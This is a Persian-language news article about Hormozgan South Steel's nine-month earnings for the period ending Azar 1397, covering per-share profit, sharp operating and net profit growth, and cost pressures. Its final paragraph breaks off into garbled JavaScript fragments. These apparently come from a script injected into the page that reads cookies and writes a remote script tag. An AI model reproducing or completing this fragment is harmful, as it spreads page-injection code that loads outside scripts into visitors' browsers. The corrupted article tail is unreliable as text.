یکشنبه ۰۳ شهریور ۱۳۹۸ , ۱۸:۱۲:۲۷
2019 / August / 25گروه صنایع معدنی، فولادبهمن ۱۵, ۱۳۹۷

سود هرسهم ۹ماهه «هرمز» به ۹۵۳ریال رسید

رشد 504درصدی سود عملیاتی فولاد هرمزگان

شرکت فولاد هرمزگان جنوب در صورت های مالی ۹ماهه منتهی به ۳۰آذر۱۳۹۷، با سرمایه ۱۵هزار میلیارد ریالی سود هرسهم را ۹۵۳ریال اعلام کرد.

به گزارش پیام‌آوران معدن و فولاد، شرکت فولاد هرمزگان جنوب در صورت های مالی ۹ماهه منتهی به ۳۰آذر۱۳۹۷ سود این دوره را ۹۵۳ریال اعلام کرد.

این شرکت سود عملیاتی این دوره نسبت به دوره گذشته را با رشد ۵۰۴درصدی مبلغ ۱۵هزار و ۳۰۲میلیارد ریال و سود خالص را با رشد ۶۲۹درصدی مبلغ ۱۴هزار و ۲۹۸میلیارد ریال اعلام کرد. همچنین سود انباشته این شرکت به ۱۳هزار و ۵۸۹میلیارد ریال رسید.

«هرمز» در نظر دارد فروش محصولات با تاکید بر محصولات با ارزش افزوده بالاتر را افزایش دهد و مقدار تولید را به یک میلیون و ۵۰۰هزار تن برساند. همچنین فروش خود را با تمرکز بر بازار صادرات افزایش دهد.

این شرکت برای دوره ۳ماهه منتهی به ۲۹اسفند۱۳۹۷، پیش بینی کرد که نرخ گندله متاثر از نرخ شمش (۲۱درصد شمش خوزستان) است که به تبع افزایش در قیمت شمش با افزایش قیمت گندله مواجه می شویم. همچنین با توجه به افزایش بسیار زیاد قیمت الکترود در ۳ماهه پایان سال۹۶ و اتمام موجودی از محل خریدهای قبلی با افزایش اثر در بهای تمام شده این کالای استراتژیک مواجه است. ضمن اینکه با افزایش نرخ ارز قطعا در کالاهای نظیر اقلام نسوز و مواد اولیه و قطعات وارداتی شاهد افزایش قیمت خواهد بود +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.